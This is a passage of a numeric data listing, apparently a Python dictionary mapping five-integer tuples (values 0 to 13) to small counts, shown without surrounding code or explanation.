(0, 3, 6, 7, 13): 2,
(0, 3, 6, 8, 8): 2,
(0, 3, 6, 8, 9): 4,
(0, 3, 6, 8, 10): 2,
(0, 3, 6, 8, 11): 2,
(0, 3, 6, 8, 12): 6,
(0, 3, 6, 8, 13): 2,
(0, 3, 6, 9, 9): 2,
(0, 3, 6, 9, 10): 3,
(0, 3, 6, 9, 11): 6,
(0, 3, 6, 9, 12): 4,
(0, 3, 6, 9, 13): 4,
(0, 3, 6, 10, 10): 2,
(0, 3, 6, 10, 11): 2,
(0, 3, 6, 10, 12): 7,
(0, 3, 6, 10, 13): 1,
(0, 3, 6, 11, 12): 3,
(0, 3, 6, 11, 13): 1,
(0, 3, 6, 12, 12): 7,
(0, 3, 6, 12, 13): 2,
(0, 3, 7, 7, 7): 2,
(0, 3, 7, 7, 8): 2,
(0, 3, 7, 7, 9): 5,
(0, 3, 7, 7, 10): 4,
(0, 3, 7, 7, 11): 2,
(0, 3, 7, 7, 12): 1,
(0, 3, 7, 7, 13): 3,
(0, 3, 7, 8, 9): 2,
(0, 3, 7, 8, 10): 3,
(0, 3, 7, 8, 11): 3,
(0, 3, 7, 8, 13): 2,
(0, 3, 7, 9, 9): 3,
(0, 3, 7, 9, 10): 2,
(0, 3, 7, 9, 11): 3,
(0, 3, 7, 9, 12): 5,
(0, 3, 7, 9, 13): 1,
(0, 3, 7, 10, 11): 3,
(0, 3, 7, 10, 12): 3,
(0, 3, 7, 10, 13): 5,
(0, 3, 7, 11, 12): 1,
(0, 3, 7, 11, 13): 1,
(0, 3, 7, 12, 13): 1,
(0, 3, 8, 8, 10): 2,
(0, 3, 8, 8, 13): 1,
(0, 3, 8, 9, 9): 2,
(0, 3, 8, 9, 10): 2,
(0, 3, 8, 9, 11): 1,
(0, 3, 8, 9, 13): 2,
(0, 3, 8, 10, 12): 4,
(0, 3, 8, 11, 11): 2,
(0, 3, 8, 11, 13): 3,
(0, 3, 9, 9, 11): 2,
(0, 3, 9, 9, 12): 2,
(0, 3, 9, 9, 13): 4,
(0, 3, 9, 10, 11): 1,
(0, 3, 9, 10, 12): 2,
(0, 3, 9, 10, 13): 1,
(0, 3, 9, 11, 11): 1,
(0, 3, 9, 11, 12): 3,
(0, 3, 9, 11, 13): 1,
(0, 3, 9, 12, 13): 2,
(0, 3, 10, 10, 12): 1,
(0, 3, 10, 10, 13): 1,
(0, 3, 10, 11, 12): 1,
(0, 3, 10, 11, 13): 2,
(0, 3, 10, 12, 12): 2,
(0, 3, 10, 12, 13): 2,
(0, 3, 10, 13, 13): 2,
(0, 3, 11, 11, 13): 1,
(0, 3, 11, 12, 13): 1,
(0, 3, 12, 12, 13): 1,
(0, 3, 12, 13, 13): 1,
(0, 3, 13, 13, 13): 2,
(0, 4, 4, 4, 10): 1,
(0, 4, 4, 5, 6): 1,
(0, 4, 4, 5, 7): 1,
(0, 4, 4, 5, 8): 1,
(0, 4, 4, 5, 10): 1,
(0, 4, 4, 6, 6): 2,
(0, 4, 4, 6, 7): 1,
(0, 4, 4, 6, 8): 3,
(0, 4, 4, 6, 9): 3,
(0, 4, 4, 6, 10): 1,
(0, 4, 4, 6, 11): 2,
(0, 4, 4, 6, 12): 2,
(0, 4, 4, 6, 13): 2,
(0, 4, 4, 7, 7): 1,
(0, 4, 4, 7, 8): 1,
(0, 4, 4, 7, 10): 4,
(0, 4, 4, 8, 10): 3,
(0, 4, 4, 8, 11): 2,
(0, 4, 4, 8, 12): 1,
(0, 4, 4, 9, 10): 2,
(0, 4, 4, 10, 11): 1,
(0, 4, 4, 10, 12): 3,
(0, 4, 4, 10, 13): 1,
(0, 4, 4, 13, 13): 1,
(0, 4, 5, 5, 7): 1,
(0, 4, 5, 5, 8): 1,
(0, 4, 5, 5, 10): 1,
(0, 4, 5, 5, 13): 2,
(0, 4, 5, 6, 6): 1,
(0, 4, 5, 6, 7): 2,
(0, 4, 5, 6, 8): 5,
(0, 4, 5, 6, 9): 1,
(0, 4, 5, 6, 11): 1,
(0, 4, 5, 6, 12): 5,
(0, 4, 5, 6, 13): 2,
(0, 4, 5, 7, 7): 2,
(0, 4, 5, 7, 9): 3,
(0, 4, 5, 7, 10): 3,
(0, 4, 5, 7, 11): 4,
(0, 4, 5, 7, 13): 1,
(0, 4, 5, 8, 8): 1,
(0, 4, 5, 8, 10): 5,
(0, 4, 5, 9, 11): 2,
(0, 4, 5, 9, 12): 3,
(0, 4, 5, 9, 13): 1,
(0, 4, 5, 10, 10): 2,
(0, 4, 5, 10, 11): 2,
(0, 4, 5, 10, 12): 5,
(0, 4, 5, 10, 13): 2,
(0, 4, 5, 11, 11): 2,
(0, 4, 5, 11, 12): 1,
(0, 4, 5, 11, 13): 1,
(0, 4, 6, 6, 6): 2,
(0, 4, 6, 6, 7): 1,
(0, 4, 6, 6, 8): 1,
(0, 4, 6, 6, 9): 2,
(0, 4, 6, 6, 10): 2,
(0, 4, 6, 6, 11): 1,
(0, 4, 6, 6, 12): 3,
(0, 4, 6, 6, 13): 1,
(0, 4, 6, 7, 7): 1,
(0, 4, 6, 7, 8): 4,
(0, 4, 6, 7, 9): 3,
(0, 4, 6, 7, 10): 4,
(0, 4, 6, 7, 11): 3,
(0, 4, 6, 7, 12): 6,
(0, 4, 6, 7, 13): 1,
(0, 4, 6, 8, 9): 4,
(0, 4, 6, 8, 10): 5,
(0, 4, 6, 8, 11): 3,
(0, 4, 6, 8, 12): 3,
(0, 4, 6, 8, 13): 1,
(0, 4, 6, 9, 9): 3,
(0, 4, 6, 9, 10): 2,
(0, 4, 6, 9, 11): 2,
(0, 4, 6, 9, 12): 8,
(0, 4, 6, 9, 13): 2,
(0, 4, 6, 10, 11): 2,
(0, 4, 6, 10, 12): 5,
(0, 4, 6, 10, 13): 3,
(0, 4, 6, 11, 11): 1,
(0, 4, 6, 11, 12): 5,
(0, 4, 6, 11, 13): 1,
(0, 4, 6, 12, 12): 3,
(0, 4, 6, 12, 13): 2,
(0, 4, 7, 7, 7): 3,
(0, 4, 7, 7, 8): 1,
(0, 4, 7, 7, 9): 2,
(0, 4, 7, 7, 10): 1,
(0, 4, 7, 7, 11): 2,
(0, 4, 7, 7, 12): 1,
(0, 4, 7, 7, 13): 1,
(0, 4, 7, 8, 8): 1,
(0, 4, 7, 8, 10): 4,
(0, 4, 7, 8, 12): 1,
(0, 4, 7, 9, 10): 2,
(0, 4, 7, 9, 11): 3,
(0, 4, 7, 9, 12): 1,
(0, 4, 7, 9, 13): 1,
(0, 4, 7, 10, 10): 2,
(0, 4, 7, 10, 11): 1,
(0, 4, 7, 10, 12): 3,
(0, 4, 7, 10, 13): 2,
(0, 4, 7, 11, 13): 3,
(0, 4, 7, 12, 12): 1,
(0, 4, 7, 12, 13): 1,
(0, 4, 8, 8, 10): 2,
(0, 4, 8, 8, 11): 1,
(0, 4, 8, 8, 13): 1,
(0, 4, 8, 9, 10): 2,
(0, 4, 8, 9, 12): 3,
(0, 4, 8, 10, 10): 2,
(0, 4, 8, 10, 11): 4,
(0, 4, 8, 10, 12): 1,
(0, 4, 8, 10, 13): 3,
(0, 4, 8, 12, 12): 1,
(0, 4, 9, 10, 11): 1,
(0, 4, 9, 10, 12): 3,
(0, 4, 9, 10, 13): 1,
(0, 4, 9, 11, 11): 1,
(0, 4, 9, 11, 12): 1,
(0, 4, 9, 11, 13): 1,
(0, 4, 10, 10, 12): 1,
(0, 4, 10, 10, 13): 2,
(0, 4, 10, 11, 12): 1,
(0, 4, 10, 11, 13): 2,
(0, 4, 10, 12, 12): 1,
(0, 4, 10, 12, 13): 1,
(0, 4, 10, 13, 13): 1,
(0, 4, 11, 11, 13): 1,
(0, 4, 12, 12, 13): 1,
(0, 4, 12, 13, 13): 1,
(0, 5, 5, 5, 7): 1,
(0, 5, 5, 5, 8): 1,
(0, 5, 5, 5, 12): 1,
(0, 5, 5, 6, 6): 1,
(0, 5, 5, 6, 7): 2,
(0, 5, 5, 6, 8): 1,
(0, 5, 5, 6, 10): 1,
(0, 5, 5, 6, 11): 1,
(0, 5, 5, 6, 12): 2,
(0, 5, 5, 6, 13): 1,
(0, 5, 5, 7, 7): 2,
(0, 5, 5, 7, 8): 1,
(0, 5, 5, 7, 10): 1,
(0, 5, 5, 7, 11): 1,
(0, 5, 5, 7, 12): 2,
(0, 5, 5, 8, 9): 3,
(0, 5, 5, 8, 10): 2,
(0, 5, 5, 8, 11): 1,
(0, 5, 5, 10, 13): 1,
(0, 5, 5, 11, 12): 2,
(0, 5, 5, 11, 13): 1,
(0, 5, 5, 12, 13): 1,
(0, 5, 6, 6, 6): 3,
(0, 5, 6, 6, 7): 2,
(0, 5, 6, 6, 8): 2,
(0, 5, 6, 6, 11): 2,
(0, 5, 6, 6, 12): 2,
(0, 5, 6, 6, 13): 2,
(0, 5, 6, 7, 7): 3,
(0, 5, 6, 7, 8): 1,
(0, 5, 6, 7, 9): 3,
(0, 5, 6, 7, 10): 1,
(0, 5, 6, 7, 11): 3,
(0, 5, 6, 7, 12): 4,
(0, 5, 6, 7, 13): 3,
(0, 5, 6, 8, 8): 2,
(0, 5, 6, 8, 9): 1,
(0, 5, 6, 8, 10): 2,
(0, 5, 6, 8, 11): 2,
(0, 5, 6, 8, 12): 4,
(0, 5, 6, 9, 9): 3,
(0, 5, 6, 9, 10): 3,
(0, 5, 6, 9, 11): 1,
(0, 5, 6, 9, 12): 5,
(0, 5, 6, 10, 12): 4,
(0, 5, 6, 10, 13): 1,
(0, 5, 6, 11, 12): 2,
(0, 5, 6, 11, 13): 3,
(0, 5, 6, 12, 12): 5,
(0, 5, 6, 12, 13): 2,
(0, 5, 7, 7, 7): 2,
(0, 5, 7, 7, 8): 3,
(0, 5, 7, 7, 9): 1,
(0, 5, 7, 7, 10): 2,
(0, 5, 7, 7, 11): 2,
(0, 5, 7, 7, 12): 4,
(0, 5, 7, 7, 13): 2,
(0, 5, 7, 8, 8): 1,
(0, 5, 7, 8, 9): 3,
(0, 5, 7, 8, 10): 2,
(0, 5, 7, 8, 11): 1,
(0, 5, 7, 8, 13): 1,
(0, 5, 7, 9, 9): 1,
(0, 5, 7, 9, 10): 3,
(0, 5, 7, 9, 11): 1,
(0, 5, 7, 9, 12): 1,
(0, 5, 7, 10, 10): 1,
(0, 5, 7, 10, 11): 3,
(0, 5, 7, 10, 12): 1,
(0, 5, 7, 11, 11): 2,
(0, 5, 7, 11, 12): 3,
(0, 5, 7, 11, 13): 2,
(0, 5, 7, 12, 12): 1,
(0, 5, 7, 12, 13): 3,
(0, 5, 7, 13, 13): 1,
(0, 5, 8, 8, 10): 2,
(0, 5, 8, 9, 10): 2,
(0, 5, 8, 9, 11): 4,
(0, 5, 8, 10, 10): 2,
(0, 5, 8, 10, 11): 1,
(0, 5, 8, 10, 12): 4,
(0, 5, 8, 10, 13): 2,
(0, 5, 8, 11, 13): 2,
(0, 5, 8, 12, 12): 1,
(0, 5, 9, 9, 12): 3,
(0, 5, 9, 10, 12): 1,
(0, 5, 9, 10, 13): 3,
(0, 5, 9, 11, 12): 1,
(0, 5, 9, 11, 13): 1,
(0, 5, 10, 10, 11): 1,
(0, 5, 10, 11, 13): 2,
(0, 5, 10, 13, 13): 1,
(0, 5, 11, 11, 13): 1,
(0, 5, 11, 12, 13): 2,
(0, 5, 11, 13, 13): 2,
(0, 5, 12, 12, 13): 1,
(0, 6, 6, 6, 6): 1,
(0, 6, 6, 6, 7): 2,
(0, 6, 6, 6, 8): 2,
(0, 6, 6, 6, 9): 2,
(0, 6, 6, 6, 10): 1,
(0, 6, 6, 6, 11): 1,
(0, 6, 6, 6, 12): 3,
(0, 6, 6, 6, 13): 2,
(0, 6, 6, 7, 7): 3,
(0, 6, 6, 7, 8): 3,
(0, 6, 6, 7, 9): 1,
(0, 6, 6, 7, 10): 1,
(0, 6, 6, 7, 11): 1,
(0, 6, 6, 7, 12): 2,
(0, 6, 6, 7, 13): 4,
(0, 6, 6, 8, 8): 2,
(0, 6, 6, 8, 9): 4,
(0, 6, 6, 8, 10): 1,
(0, 6, 6, 8, 11): 1,
(0, 6, 6, 8, 12): 3,
(0, 6, 6, 8, 13): 2,
(0, 6, 6, 9, 9): 1,
(0, 6, 6, 9, 10): 2,
(0, 6, 6, 9, 12): 2,
(0, 6, 6, 9, 13): 1,
(0, 6, 6, 10, 10): 1,
(0, 6, 6, 10, 11): 1,
(0, 6, 6, 10, 12): 2,
(0, 6, 6, 10, 13): 1,
(0, 6, 6, 11, 11): 1,
(0, 6, 6, 11, 12): 2,
(0, 6, 6, 11, 13): 1,
(0, 6, 6, 12, 12): 1,
(0, 6, 6, 12, 13): 3,
(0, 6, 6, 13, 13): 2,
(0, 6, 7, 7, 7): 2,
(0, 6, 7, 7, 8): 2,
(0, 6, 7, 7, 9): 2,
(0, 6, 7, 7, 10): 1,
(0, 6, 7, 7, 11): 2,
(0, 6, 7, 7, 12): 2,
(0, 6, 7, 7, 13): 4,
(0, 6, 7, 8, 8): 2,
(0, 6, 7, 8, 9): 1,
(0, 6, 7, 8, 10): 2,
(0, 6, 7, 8, 11): 1,
(0, 6, 7, 8, 12): 4,
(0, 6, 7, 8, 13): 3,
(0, 6, 7, 9, 9): 1,
(0, 6, 7, 9, 10): 1,
(0, 6, 7, 9, 11): 2,
(0, 6, 7, 9, 12): 3,
(0, 6, 7, 9, 13): 1,
(0, 6, 7, 10, 10): 1,
(0, 6, 7, 10, 11): 2,
(0, 6, 7, 10, 12): 3,
(0, 6, 7, 10, 13): 1,
(0, 6, 7, 11, 11): 1,
(0, 6, 7, 11, 12): 3,
(0, 6, 7, 11, 13): 1,
(0, 6, 7, 12, 12): 3,
(0, 6, 7, 12, 13): 2,
(0, 6, 7, 13, 13): 2,
(0, 6, 8, 8, 8): 1,
(0, 6, 8, 8, 9): 1,
(0, 6, 8, 8, 11): 1,
(0, 6, 8, 8, 13): 1,
(0, 6, 8, 9, 9): 1,
(0, 6, 8, 9, 10): 2,
(0, 6, 8, 9, 12): 6,
(0, 6, 8, 10, 10): 3,
(0, 6, 8, 10, 11): 3,
(0, 6, 8, 10, 13): 1,
(0, 6, 8, 11, 11): 1,
(0, 6, 8, 11, 12): 2,
(0, 6, 8, 12, 12): 2,
(0, 6, 8, 12, 13): 3,
(0, 6, 8, 13, 13): 1,
(0, 6, 9, 9, 10): 1,
(0, 6, 9, 9, 11): 2,
(0, 6, 9, 9, 12): 1,
(0, 6, 9, 9, 13): 1,
(0, 6, 9, 10, 12): 3,
(0, 6, 9, 11, 12): 2,
(0, 6, 9, 11, 13): 1,
(0, 6, 9, 12, 12): 4,
(0, 6, 9, 12, 13): 2,
(0, 6, 10, 10, 13): 2,
(0, 6, 10, 11, 12): 1,
(0, 6, 10, 12, 13): 2,
(0, 6, 10, 13, 13): 1,
(0, 6, 11, 11, 13): 2,
(0, 6, 11, 12, 12): 1,
(0, 6, 11, 12, 13): 1,
(0, 6, 12, 12, 12): 1,
(0, 7, 7, 7, 7): 1,
(0, 7, 7, 7, 8): 3,
(0, 7, 7, 7, 9): 1,
(0, 7, 7, 7, 10): 2,
(0, 7, 7, 7, 11): 1,
(0, 7, 7, 7, 12): 2,
(0, 7, 7, 7, 13): 2,
(0, 7, 7, 8, 8): 1,
(0, 7, 7, 8, 9): 1,
(0, 7, 7, 8, 11): 1,
(0, 7, 7, 8, 13): 2,
(0, 7, 7, 9, 9): 1,
(0, 7, 7, 9, 10): 1,
(0, 7, 7, 9, 12): 2,
(0, 7, 7, 9, 13): 1,
(0, 7, 7, 10, 10): 1,
(0, 7, 7, 10, 11): 1,
(0, 7, 7, 10, 13): 2,
(0, 7, 7, 11, 11): 1,
(0, 7, 7, 11, 12): 1,
(0, 7, 7, 11, 13): 1,
(0, 7, 7, 12, 12): 1,
(0, 7, 7, 12, 13): 2,
(0, 7, 7, 13, 13): 2,
(0, 7, 8, 8, 10): 1,
(0, 7, 8, 9, 11): 1,
(0, 7, 8, 9, 12): 1,
(0, 7, 8, 9, 13): 2,
(0, 7, 8, 10, 11): 1,
(0, 7, 8, 10, 12): 3,
(0, 7, 8, 11, 13): 1,
(0, 7, 9, 9, 12): 3,
(0, 7, 9, 10, 11): 3,
(0, 7, 9, 10, 13): 1,
(0, 7, 9, 11, 12): 1,
(0, 7, 9, 12, 13): 1,
(0, 7, 9, 13, 13): 1,
(0, 7, 10, 10, 12): 1,
(0, 7, 10, 11, 13): 1,
(0, 7, 10, 12, 12): 1,
(0, 7, 10, 12, 13): 1,
(0, 7, 11, 11, 13): 1,
(0, 7, 11, 12, 12): 1,
(0, 7, 11, 12, 13): 2,
(0, 8, 8, 9, 13): 1,
(0, 8, 8, 10, 12): 2,
(0, 8, 8, 10, 13): 2,
(0, 8, 8, 11, 11): 1,
(0, 8, 8, 13, 13): 1,
(0, 8, 9, 10, 12): 1,
(0, 8, 9, 10, 13): 1,
(0, 8, 9, 11, 11): 1,
(0, 8, 9, 11, 13): 1,
(0, 8, 9, 12, 13): 1,
(0, 8, 10, 10, 11): 1,
(0, 8, 10, 11, 12): 1,
(0, 8, 10, 11, 13): 2,
(0, 8, 10, 12, 12): 1,
(0, 8, 10, 12, 13): 2,
(0, 8, 11, 11, 12): 1,
(0, 8, 11, 13, 13): 2,
(0, 9, 9, 11, 12): 2,
(0, 9, 9, 11, 13): 1,
(0, 9, 9, 12, 12): 1,
(0, 9, 10, 10, 13): 1,
(0, 9, 10, 11, 11): 1,
(0, 9, 10, 11, 12): 2,
(0, 9, 10, 11, 13): 1,
(0, 9, 10, 12, 12): 2,
(0, 9, 10, 13, 13): 1,
(0, 9, 11, 11, 11): 1,
(0, 9, 11, 12, 13): 1,
(0, 10, 10, 10, 12): 1,
(0, 10, 10, 11, 11): 1,
(0, 10, 10, 11, 12): 1,
(0, 10, 10, 12, 13): 1,
(0, 10, 11, 11, 13): 1,
(1, 1, 1, 1, 13): 1,
(1, 1, 1, 2, 7): 2,
(1, 1, 1, 2, 10): 2,
(1, 1, 1, 2, 11): 2,
(1, 1, 1, 2, 12): 2,
(1, 1, 1, 2, 13): 1,
(1, 1, 1, 3, 6): 2,
(1, 1, 1, 3, 7): 2,
(1, 1, 1, 3, 8): 1,
(1, 1, 1, 3, 10): 1,
(1, 1, 1, 3, 11): 3,
(1, 1, 1, 3, 12): 2,
(1, 1, 1, 3, 13): 3,
(1, 1, 1, 4, 5): 1,
(1, 1, 1, 4, 6): 3,
(1, 1, 1, 4, 7): 2,
(1, 1, 1, 4, 8): 2,
(1, 1, 1, 4, 9): 1,
(1, 1, 1, 4, 10): 4,
(1, 1, 1, 4, 11): 3,
(1, 1, 1, 4, 12): 3,
(1, 1, 1, 4, 13): 1,
(1, 1, 1, 5, 5): 1,
(1, 1, 1, 5, 6): 2,
(1, 1, 1, 5, 7): 3,
(1, 1, 1, 5, 8): 2,
(1, 1, 1, 5, 9): 4,
(1, 1, 1, 5, 10): 1,
(1, 1, 1, 5, 11): 1,
(1, 1, 1, 5, 12): 1,
(1, 1, 1, 5, 13): 1,
(1, 1, 1, 6, 6): 1,
(1, 1, 1, 6, 7): 3,
(1, 1, 1, 6, 8): 4,
(1, 1, 1, 6, 9): 1,
(1, 1, 1, 6, 10): 1,
(1, 1, 1, 6, 12): 3,
(1, 1, 1, 6, 13): 1,
(1, 1, 1, 7, 7): 2,
(1, 1, 1, 7, 8): 2,
(1, 1, 1, 7, 9): 2,
(1, 1, 1, 7, 10): 1,
(1, 1, 1, 7, 11): 1,
(1, 1, 1, 7, 12): 1,
(1, 1, 1, 7, 13): 2,
(1, 1, 1, 8, 8): 1,
(1, 1, 1, 8, 12): 2,
(1, 1, 1, 8, 13): 1,
(1, 1, 1, 9, 11): 2,
(1, 1, 1, 9, 12): 2,
(1, 1, 1, 9, 13): 1,
(1, 1, 1, 10, 10): 1,
(1, 1, 1, 10, 11): 1,
(1, 1, 1, 10, 12): 2,
(1, 1, 1, 11, 11): 1,
(1, 1, 2, 2, 6): 2,
(1, 1, 2, 2, 7): 4,
(1, 1, 2, 2, 8): 1,
(1, 1, 2, 2, 9): 1,
(1, 1, 2, 2, 10): 6,
(1, 1, 2, 2, 11): 7,
(1, 1, 2, 2, 12): 3,
(1, 1, 2, 2, 13): 4,
(1, 1, 2, 3, 5): 6,
(1, 1, 2, 3, 6): 8,
(1, 1, 2, 3, 7): 6,
(1, 1, 2, 3, 8): 6,
(1, 1, 2, 3, 9): 5,
(1, 1, 2, 3, 10): 8,
(1, 1, 2, 3, 11): 8,
(1, 1, 2, 3, 12): 11,
(1, 1, 2, 3, 13): 5,
(1, 1, 2, 4, 4): 1,
(1, 1, 2, 4, 5): 7,
(1, 1, 2, 4, 6): 6,
(1, 1, 2, 4, 7): 8,
(1, 1, 2, 4, 8): 5,
(1, 1, 2, 4, 9): 9,
(1, 1, 2, 4, 10): 5,
(1, 1, 2, 4, 11): 7,
(1, 1, 2, 4, 12): 8,
(1, 1, 2, 4, 13): 10,
(1, 1, 2, 5, 5): 2,
(1, 1, 2, 5, 6): 6,
(1, 1, 2, 5, 7): 5,
(1, 1, 2, 5, 8): 9,
(1, 1, 2, 5, 9): 6,
(1, 1, 2, 5, 10): 8,
(1, 1, 2, 5, 11): 6,
(1, 1, 2, 5, 12): 9,
(1, 1, 2, 5, 13): 5,
(1, 1, 2, 6, 6): 1,
(1, 1, 2, 6, 7): 6,
(1, 1, 2, 6, 8): 4,
(1, 1, 2, 6, 9): 9,
(1, 1, 2, 6, 10): 6,
(1, 1, 2, 6, 11): 7,
(1, 1, 2, 6, 12): 8,
(1, 1, 2, 6, 13): 7,
(1, 1, 2, 7, 7): 3,
(1, 1, 2, 7, 8): 8,
(1, 1, 2, 7, 9): 4,
(1, 1, 2, 7, 10): 6,
(1, 1, 2, 7, 11): 2,
(1, 1, 2, 7, 12): 7,
(1, 1, 2, 7, 13): 6,
(1, 1, 2, 8, 8): 1,
(1, 1, 2, 8, 9): 3,
(1, 1, 2, 8, 10): 5,
(1, 1, 2, 8, 11): 6,
(1, 1, 2, 8, 12): 5,
(1, 1, 2, 8, 13): 6,
(1, 1, 2, 9, 9): 1,
(1, 1, 2, 9, 10): 3,
(1, 1, 2, 9, 11): 6,
(1, 1, 2, 9, 12): 9,
(1, 1, 2, 9, 13): 5,
(1, 1, 2, 10, 10): 3,
(1, 1, 2, 10, 11): 6,
(1, 1, 2, 10, 12): 5,
(1, 1, 2, 10, 13): 5,
(1, 1, 2, 11, 11): 3,
(1, 1, 2, 11, 12): 5,
(1, 1, 2, 12, 13): 2,
(1, 1, 2, 13, 13): 1,
(1, 1, 3, 3, 4): 3,
(1, 1, 3, 3, 5): 3,
(1, 1, 3, 3, 6): 6,
(1, 1, 3, 3, 7): 3,
(1, 1, 3, 3, 8): 3,
(1, 1, 3, 3, 9): 3,
(1, 1, 3, 3, 10): 3,
(1, 1, 3, 3, 11): 3,
(1, 1, 3, 3, 12): 4,
(1, 1, 3, 3, 13): 2,
(1, 1, 3, 4, 4): 2,
(1, 1, 3, 4, 5): 5,
(1, 1, 3, 4, 6): 5,
(1, 1, 3, 4, 7): 7,
(1, 1, 3, 4, 8): 6,
(1, 1, 3, 4, 9): 9,
(1, 1, 3, 4, 10): 7,
(1, 1, 3, 4, 11): 6,
(1, 1, 3, 4, 12): 12,
(1, 1, 3, 4, 13): 4,
(1, 1, 3, 5, 5): 2,
(1, 1, 3, 5, 6): 3,
(1, 1, 3, 5, 7): 5,
(1, 1, 3, 5, 8): 5,
(1, 1, 3, 5, 9): 7,
(1, 1, 3, 5, 10): 6,
(1, 1, 3, 5, 11): 7,
(1, 1, 3, 5, 12): 6,
(1, 1, 3, 5, 13): 5,
(1, 1, 3, 6, 6): 4,
(1, 1, 3, 6, 7): 6,
(1, 1, 3, 6, 8): 9,
(1, 1, 3, 6, 9): 7,
(1, 1, 3, 6, 10): 8,
(1, 1, 3, 6, 11): 5,
(1, 1, 3, 6, 12): 10,
(1, 1, 3, 6, 13): 9,
(1, 1, 3, 7, 7): 3,
(1, 1, 3, 7, 8): 4,
(1, 1, 3, 7, 9): 8,
(1, 1, 3, 7, 10): 5,
(1, 1, 3, 7, 11): 7,
(1, 1, 3, 7, 12): 6,
(1, 1, 3, 7, 13): 5,
(1, 1, 3, 8, 8): 3,
(1, 1, 3, 8, 9): 4,
(1, 1, 3, 8, 10): 7,
(1, 1, 3, 8, 11): 4,
(1, 1, 3, 8, 12): 6,
(1, 1, 3, 8, 13): 2,
(1, 1, 3, 9, 9): 4,
(1, 1, 3, 9, 10): 6,
(1, 1, 3, 9, 11): 4,
(1, 1, 3, 9, 12): 7,
(1, 1, 3, 9, 13): 6,
(1, 1, 3, 10, 10): 3,
(1, 1, 3, 10, 11): 4,
(1, 1, 3, 10, 12): 8,
(1, 1, 3, 10, 13): 5,
(1, 1, 3, 11, 11): 3,
(1, 1, 3, 11, 12): 3,
(1, 1, 3, 11, 13): 4,
(1, 1, 3, 12, 12): 4,
(1, 1, 3, 12, 13): 4,
(1, 1, 3, 13, 13): 3,
(1, 1, 4, 4, 5): 3,
(1, 1, 4, 4, 6): 2,
(1, 1, 4, 4, 7): 4,
(1, 1, 4, 4, 8): 1,
(1, 1, 4, 4, 9): 3,
(1, 1, 4, 4, 10): 6,
(1, 1, 4, 4, 11): 5,
(1, 1, 4, 4, 12): 2,
(1, 1, 4, 4, 13): 4,
(1, 1, 4, 5, 5): 2,
(1, 1, 4, 5, 6): 3,
(1, 1, 4, 5, 7): 2,
(1, 1, 4, 5, 8): 8,
(1, 1, 4, 5, 9): 6,
(1, 1, 4, 5, 10): 8,
(1, 1, 4, 5, 11): 5,
(1, 1, 4, 5, 12): 8,
(1, 1, 4, 5, 13): 3,
(1, 1, 4, 6, 6): 4,
(1, 1, 4, 6, 7): 6,
(1, 1, 4, 6, 8): 5,
(1, 1, 4, 6, 9): 9,
(1, 1, 4, 6, 10): 7,
(1, 1, 4, 6, 11): 7,
(1, 1, 4, 6, 12): 5,
(1, 1, 4, 6, 13): 9,
(1, 1, 4, 7, 7): 4,
(1, 1, 4, 7, 8): 8,
(1, 1, 4, 7, 9): 4,
(1, 1, 4, 7, 10): 6,
(1, 1, 4, 7, 11): 4,
(1, 1, 4, 7, 12): 13,
(1, 1, 4, 7, 13): 3,
(1, 1, 4, 8, 8): 1,
(1, 1, 4, 8, 9): 6,
(1, 1, 4, 8, 10): 5,
(1, 1, 4, 8, 11): 9,
(1, 1, 4, 8, 12): 3,
(1, 1, 4, 8, 13): 8,
(1, 1, 4, 9, 9): 1,
(1, 1, 4, 9, 10): 5,
(1, 1, 4, 9, 11): 3,
(1, 1, 4, 9, 12): 8,
(1, 1, 4, 9, 13): 2,
(1, 1, 4, 10, 10): 2,
(1, 1, 4, 10, 11): 6,
(1, 1, 4, 10, 12): 4,
(1, 1, 4, 10, 13): 5,
(1, 1, 4, 11, 11): 1,
(1, 1, 4, 11, 12): 7,
(1, 1, 4, 11, 13): 3,
(1, 1, 4, 12, 12): 2,
(1, 1, 4, 12, 13): 6,
(1, 1, 4, 13, 13): 2,
(1, 1, 5, 5, 6): 2,
(1, 1, 5, 5, 7): 3,
(1, 1, 5, 5, 8): 4,
(1, 1, 5, 5, 9): 3,
(1, 1, 5, 5, 10): 1,
(1, 1, 5, 5, 11): 4,
(1, 1, 5, 5, 12): 3,
(1, 1, 5, 5, 13): 3,
(1, 1, 5, 6, 6): 5,
(1, 1, 5, 6, 7): 12,
(1, 1, 5, 6, 8): 7,
(1, 1, 5, 6, 9): 7,
(1, 1, 5, 6, 10): 6,
(1, 1, 5, 6, 11): 4,
(1, 1, 5, 6, 12): 10,
(1, 1, 5, 6, 13): 5,
(1, 1, 5, 7, 7): 6,
(1, 1, 5, 7, 8): 6,
(1, 1, 5, 7, 9): 6,
(1, 1, 5, 7, 10): 3,
(1, 1, 5, 7, 11): 5,
(1, 1, 5, 7, 12): 5,
(1, 1, 5, 7, 13): 8,
(1, 1, 5, 8, 8): 4,
(1, 1, 5, 8, 9): 2,
(1, 1, 5, 8, 10): 4,
(1, 1, 5, 8, 11): 3,
(1, 1, 5, 8, 12): 8,
(1, 1, 5, 8, 13): 1,
(1, 1, 5, 9, 9): 1,
(1, 1, 5, 9, 10): 3,
(1, 1, 5, 9, 11): 5,
(1, 1, 5, 9, 12): 2,
(1, 1, 5, 9, 13): 4,
(1, 1, 5, 10, 10): 1,
(1, 1, 5, 10, 11): 2,
(1, 1, 5, 10, 12): 6,
(1, 1, 5, 10, 13): 3,
(1, 1, 5, 11, 11): 1,
(1, 1, 5, 11, 12): 1,
(1, 1, 5, 11, 13): 3,
(1, 1, 5, 12, 12): 3,
(1, 1, 5, 12, 13): 3,
(1, 1, 5, 13, 13): 3,
(1, 1, 6, 6, 6): 1,
(1, 1, 6, 6, 7): 8,
(1, 1, 6, 6, 8): 5,
(1, 1, 6, 6, 9): 3,
(1, 1, 6, 6, 10): 2,
(1, 1, 6, 6, 11): 3,
(1, 1, 6, 6, 12): 7,
(1, 1, 6, 6, 13): 4,
(1, 1, 6, 7, 7): 8,
(1, 1, 6, 7, 8): 13,
(1, 1, 6, 7, 9): 6,
(1, 1, 6, 7, 10): 3,
(1, 1, 6, 7, 11): 4,
(1, 1, 6, 7, 12): 9,
(1, 1, 6, 7, 13): 8,
(1, 1, 6, 8, 8): 3,
(1, 1, 6, 8, 9): 3,
(1, 1, 6, 8, 10): 3,
(1, 1, 6, 8, 11): 6,
(1, 1, 6, 8, 12): 4,
(1, 1, 6, 8, 13): 8,
(1, 1, 6, 9, 9): 1,
(1, 1, 6, 9, 10): 4,
(1, 1, 6, 9, 11): 3,
(1, 1, 6, 9, 12): 6,
(1, 1, 6, 9, 13): 3,
(1, 1, 6, 10, 10): 2,
(1, 1, 6, 10, 11): 2,
